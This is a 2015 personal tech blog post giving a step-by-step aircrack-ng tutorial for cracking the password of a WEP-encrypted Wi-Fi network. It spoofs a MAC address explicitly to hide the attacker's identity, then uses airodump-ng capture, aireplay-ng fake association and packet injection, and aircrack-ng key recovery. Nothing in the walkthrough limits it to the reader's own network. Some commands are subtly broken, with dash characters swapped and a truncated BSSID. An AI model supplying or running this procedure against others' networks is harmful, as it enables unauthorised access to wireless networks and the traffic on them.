Friday, 26 June 2015

HACKING WIFI PASSWORD (PART 1) WEP


Hi Friends, Today I am going to teach you how to exploit a WEP encrypted wireless network. Due to having more secure protocols available like WPA or WPA2, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network. But Learning is good. Also by this you will get an idea how to exploit a Wireless Network. Learn HOW TO CRACK WPA or WPA2 Password in my next Post.

So, WEP stands for Wireless Equivalent Privacy has been around 1999. It is a older security standard that is used to secure wireless network that time. Later on, In 2003 WEP replaced by WPA and later WAP2. There are many ways to hack WEP but for now here we will use AirCrack Suite or AirCrack NG. This is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the password.

Before we Start let me tell you something, experience with kali terminal window is required, for me KALI-Linux is the Best. You can use this tool in Windows also download the suite from Google. For now I am using Kali here.

:: Let’s Start ::

1} Open a Terminal and bring up a list of wireless network interfaces, so command for that is:
 airmon-ng

2} Under the interface column, select one of your interface. Here I will use wlan0. You may get 
different like mon0.

3} Now, we need to stop the wlan0 and take it down so that we can change our MAC address.


airmon-ng stop

  ifconfig wlan0 down

NOTE: MAC address is an identity of a machine on a Network. You can check your MAC address by the command: ifconfig

4} Now, we will change it. By changing the MAC address we can hide our original identity. For this tutorial we will use 00.10.20.30.40.50.


            macchanger --mac 00.10.20.30.40.50 wlan0

5} Now we need to restart the Airmon. So,


    airmon-ng start wlan0

6} Now, we will use Airodump to locate the available wireless network nearby.


  airodump-ng wlan0

7} A list of available networks will appear. Select right one, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right click your mouse, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In my case channel is 10.

8} Now we run airodump command and copy the information for the selected BSSID to a file. We will utilize the following options:

–c allows us to select our channel. In this case, we use 10.
–w allows us to select the name of our file. In this case, we have chosen tutorialhack
–bssid allows us to select our BSSID. For this Tutorial, we will paste 09:AC:90:AB:78from the clipboard.

airodump-ng –c 10 –w tutorialhack --bssid 09:AC:90:AB:78 wlan0

9} A terminal windows will open. Don’t worry it is the output of the above command, leave it open.

10}Open another terminal window; to attempt to make an association, we will run aireplay command, which has the following syntax:
aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface]


So, aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0

11}Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format:
aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface]


So, aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0

12}  Your screen will begin to fill with traffic. Let this process run for a minute or two until we have information to run the crack.

13} Finally, we run AirCrack to crack the WEP key.


aircrack-ng –b 09:AC:90:AB:78 tutorialhack.cap 

That's it!

Till Confused what happened, Look Below:
            I think up to step 9 all are easy to understand for beginner also, from step10 only it is important, what we done here is we used aireplay command to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password.

All done. Any Problem Contact me I will help for sure.

Come to Facebook Page to Solve your Problems.

Follow me on Facebook, Twitter, Google+. Subscribe to RSS.
Previous Post
Next Post

Hi, I'm Gaurav Thakur. I'm the proud owner of PahadiGeeks. I've interest in tech since childhood. So, I thought to why not share my knowledge with you guys. This gives birth to our blog, PahadiGeeks.com

0 comments: